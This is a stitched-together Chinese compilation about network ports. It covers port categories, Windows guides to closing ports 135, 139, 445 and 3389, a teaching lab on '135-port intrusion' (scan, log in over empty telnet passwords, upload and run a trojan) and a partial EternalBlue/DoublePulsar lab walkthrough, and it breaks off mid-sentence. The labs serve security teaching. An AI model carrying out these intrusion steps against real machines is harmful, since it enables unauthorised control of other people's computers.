常用端口号大全 20和21，究竟哪个是传控制的，哪个是传数据的？ ftp-data 20/tcp File Transfer [Default Data] ftp-data 20/udp File Transfer [Default Data] ftp 21/tcp File Transfer [Control] ftp 21/udp File Transfer [Control] FTP就是文件传输协议File Transfer Protocol 的缩写. FTP端口号是21 FTP的端口号能改 ftp的端口号20、21的区别一个是数据端口，一个是控制端口，控制端口一般为21，而数据端口不一定是20，这和FTP的应用模式有关，如果是主动模式，应该为20，如果为被动模式，由服务器端和客户端协商而定 电脑上有多少个端口？我怎么样才能知道自己的电脑哪些端口是开的？那些是关的？哪些是可用的？怎么样才能把打开着的关了，把关着的打开，电脑上有多少个端口。 计算机“端口”是英文port的义译，可以认为是计算机与外界通讯交流的出口。其中硬件领域的端口又称接口，如：USB端口、串行端口等。软件领域的端口一般指网络中面向连接服务和无连接服务的通信协议端口，是一种抽象的软件结构，包括一些数据结构和I/O（基本输入输出）缓冲区。 按端口号可分为3大类： （1）公认端口（Well Known Ports）：从0到1023，它们紧密绑定（binding）于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如：80端口实际上总是HTTP通讯。 （2）注册端口（Registered Ports）：从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口，这些端口同样用于许多其它目的。例如：许多系统处理动态端口从1024左右开始。 （3）动态和/或私有端口（Dynamic and/or Private Ports）：从49152到65535。理论上，不应为服务分配这些端口。实际上，机器通常从1024起分配动态端口。但也有例外：SUN的RPC端口从32768开始。 一些端口常常会被黑客利用，还会被一些木马病毒利用，对计算机系统进行攻击，以下是计算机端口的介绍以及防止被黑客攻击的简要办法。 8080端口 端口说明：8080端口同80端口，是被用于WWW代理服务的，可以实现网页浏览，经常在访问某

如何打开端口号

竭诚为您提供优质文档/双击可除 如何打开端口号 篇一：如何关闭与开启端口 如何关闭与开启端口 如何开启端口 跟大家介绍过很多的Ipc$入侵,可是这些都要求以对方有着Ipc$netbios的共享,也就可以说当对方必须打开了139或445等等这些端口这些所谓的Ipc$攻击才能有用武之地,然而除了在借助扫描工具查找开有此端口的机器外,可不可以自己开启呢,当然可以.如下就是一些常用开启端口的方法 ------------------------------------------------------------------用netstat-an查看端口状态 禁用端口看下面 1.通过对开始->程序->管理工具->本地安全策略->（鼠标右击）Ip安全策略，在本地机器点击"管理Ip筛选器表和筛选器操作"后在"管理Ip筛选器列表"选项卡上点击"添加"管理Ip筛选器列表"选项卡上点击"添加"

这个时候就会弹出"Ip筛选器列表"窗口 分别添入名称和描述，随便填写的哦，然后点击"添加"，接着出现一个Ip"筛选器向导"，点下一步。 此时"指定Ip源地址"窗口，在"源地址"中选择"任何Ip 地址"，点下一步。 在"Ip通信目标"的"目标地址"选择"我的Ip地址"，点 下一步。 在"Ip协议类型"的"选择协议类型"选择"Tcp"，点下一步。 在"筛选器向导"的"设置Ip协议端口"里第一栏为"从任意端口"，第二栏为"到此端口"并添上"139"，点下一步接着点击"完成"，然后再单击"关闭"回到"管理Ip筛选器表和筛选器操作"窗口大家有没有看见封杀139端口几个 字啊，，呵呵，，这个就是我们需要的！：）选择择"管理筛选 器操作"选项卡点"添加" 大家注意一下就在刚才我们添加的那个活动页的旁边 的另外一个活动页就是这个管理筛选器的咚咚，要选上使用添加向导哦 样会出现一个"筛先器操作向导"的窗口，点击"下一步"，在"名称"里随便填写，不用和我的一样，呵呵，自己想填什么就填什么但是别忘记了， 按"下一步"，并选择"阻止"，再按"下一步"

135端口入侵

实验5 135端口入侵 一、实验目的 通过这项实验旨在使学生对135端口入侵有一定的了解，提高同学们的安全意识，掌握配置安全系统的能力。 二、实验任务 任务性质：黑客攻防 三、任务描述： 扫描局域网中开放的135端口，运用工具，开启telnet服务，登录对方主机，放入木马。 四、任务步骤： （1）用x-san扫描主机，发现开启135端口主机； （2）用ntscan扫描开启135端口主机，telnet登录密码是否为空； （3）发现telnet登录密码为空的主机，用recov启动telnet服务； （4）建立ftp服务器，将木马放入ftp服务器； （5）通过telnet登录ftp服务器，将木马上传上目标主机，并运行； （6）肉鸡完成。 五、总结关闭135端口，445端口，139端口，3389端口的方法。 端口关闭前查看开启端口：

1、关闭445端口经过注册表更改 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NetBT\Parameters] [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NetBT\Parameters] 在“Parameters”项上，右键单击，选择“新建”——“DWORD值”。 将DWORD值命名为“SMBDeviceEnabled”。右键单击“SMBDeviceEnabled”值，选择“修改”。在“数值数据”下，输入“0”，单击“确定”按钮。 2、关闭135端口经过注册表更改 （1）在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole] 项中把EnableDCOM的值改为“N” （2）在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc] 项中把DCOM Protocols 键值中删除 “ncacn_ip_tcp” （3）停用“Distributed Transaction Coordinator”服务 3、关闭3389 端口 （1）在我的电脑上点右键选属性-->远程，将里面的远程协助和远程桌面 两个选项框里的勾去掉

永恒之蓝3389漏洞原理详解解析

实验环境 ?操作机：Windows XP o IP : 172.16.11.2 ?操作机：Kali Linux o IP : 172.16.12.2 ?目标机：Windows 7 64位 o IP : 172.16.12.3 ?目标机：Windows Server 2003 o IP : 172.16.12.4 ?掌握工具的用法以及临时防御措施 实验步骤 实验工具 ?Metasploit：是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程等 ?Equation Group Tools：这是一个集成的工具包，里面包含了IIS6.0、445端口、3389端口、Rootkit等远程利用工具，本次试验我们主要用到它的445端口远程入侵功能，以及3389远程端口入侵功能。 实验内容 Shadow Brokers再次暴露出一份震惊世界的机密文档，其中包含了多个W indows 远程漏洞利用工具，可以覆盖大量的Windows 服务器，一夜之间所有Windows服务器几乎全线暴露在危险之中，任何人都可以直接下载并远程攻击利用，考虑到国内不少高校、政府、国企甚至还有一些互联网公司还在使用W indows 服务器，这次事件影响力堪称网络大地震。 影响版本

全球70% 的Windows 服务器，包括Windows NT、Windows 2000、Windo ws XP、Windows 2003、Windows Vista、Windows 7、Windows 8，Windows 200 8、Windows 2008 R2、Windows Server 2012 SP0 危害 攻击者通过执行脚本，使目标主机蓝屏重启，获取Windows目标主机权 限，对目标机器进行任意操作，攻击成本和利用条件都很低，只需在本地执行脚本，并设置相关参数。一旦攻击成功，攻击者能直接控制目标主机，甚至直接下载数据库，盗取商业机密，很多的政府、事业单位都会受到影响，影响极大，危害不言而喻。 步骤1：利用Eternalblue与Doublepulsar插件，验证445 SMB漏洞我们本步骤利用Eternalblue和Doublepulsar这两个"插件"来获取Windows 7 64位的系统权限。 其中Eternalblue可以利用SMB漏洞，获取Windows 7 系统权限 而Doublepulsar可以加载Metasploit生成的恶意DLL。 我们首先进入cmd命令行，在命令行中进入文件夹： cd C:\EQGRP_Lost_in_Translation-master/Windows 输入命令： fb.py //运行python文件 注：在一般情况下需要在工具根目录下创建listeningposts文件夹，否则运行文件时，会报错。 接下来依次填入对应信息： 172.16.12.3//目标IP 172.16.11.2//本地IP no //取消重定向 c:\logs //指定日志文件目录

windows2003怎么通过修改注册表来禁用139和135端口

通过防火墙看到网络流量50%以上被System的东西占用着，而公司其实电脑都用同样的防火墙看不到System占用流量。查看具体情况发现主机流向三个端口，135,139,445,后来通过防火墙和本地安全策略来禁用这三个端口，效果不大！今天又查到以配置注册表来禁用445端口的方法：修改注册表，添加一个键值Hive: HKEY_LOCAL_MACHINE Key: System\CurrentControlSet\Services\NetBT\Parameters Name: SMBDeviceEnabled Type: REG_DWORD Value: 0 重起后，立马无445端口的流量动态。效果非常有效！求使用注册表来禁用135和139端口的方法！ Windows中如何手动关闭端口和阻止非法入侵我们一般采用一些功能强大的 反黑软件和防火墙来保证我们的系统安全，但是有些用户不具备上述条件。怎么办呢？下面就介绍一种简易的办法——通过限制端口来帮助大家防止非法入侵。非法入侵的方式简单说来，非法入侵的方式可粗略分为4种：1、扫描端口，通过已知的系统Bug攻入主机。2、种植木马，利用木马开辟的后门进入主机。 3、采用数据溢出的手段，迫使主机提供后门进入主机。 4、利用某些软件设计的漏洞，直接或间接控制主机。非法入侵的主要方式是前两种，尤其是利用一些流行的黑客工具，通过第一种方式攻击主机的情况最多、也最普遍；而对后两种方式来说，只有一些手段高超的黑客才利用，波及面并不广泛，而且只要这两种问题一出现，软件服务商很快就会提供补丁，及时修复系统。因此，如果能限制前两种非法入侵方式，就能有效防止利用黑客工具的非法入侵。而且前两种非法入侵方式有一个共同点，就是通过端口进入主机。端口就像一所房子(服务器)的几个门一样，不同的门通向不同的房间(服务器提供的不同服务)。我们常用的FTP默认端口为21，而WWW网页一般默认端口是80。但是有些马虎的网络管理员常常打开一些容易被侵入的端口服务，比如139等；还有一些木马程序，比如冰河、BO、广外等都是自动开辟一个您不察觉的端口。那么，只要我们把自己用不到的端口全部封锁起来，不就杜绝了这两种非法入侵吗？限制端口的方法对于个人用户来说，您可以限制所有的端口，因为您根本不必让您的机器对外提供任何服务；而对于对外提供网络服务的服务器，我们需把必须利用的端口(比如WWW端口80、FTP端口21、邮件服务端口2 5、110等)开放，其他的端口则全部关闭。这里，对于采用Windows2000/XP/2003的用户来说，不需要安装任何其他软件，可以利用"修改组策略"或"TCP/IP筛选功能"限制服务器的端口。具体设置如下：第一种方法——“修改组策略”: 第一步，在“运行”输入gpedit.msc，回车打开“组策略”，在组策略中的windows设置-安全设置中选中“IP 安全策略，在本地计算机”，在右边窗格的空白位置右击鼠标，弹出快捷菜单，选择“创建IP 安全策略”，于是弹出一个向导。在向导中点击“下一步”按钮，为新的安全策略命名；再按“下一步”，则显示“安全通信请求”画面，在画面上把“激活默认相应规则”左边的钩去掉，点击“完成”按钮就创建了一个新的IP 安全策略。第二步，右击该IP安全策略，在“属性”对话框中，把“使用添加向导”左边的钩去掉，然后单击“添加”按钮添加新的规则，随后弹出“新规则属性”对话框，在画面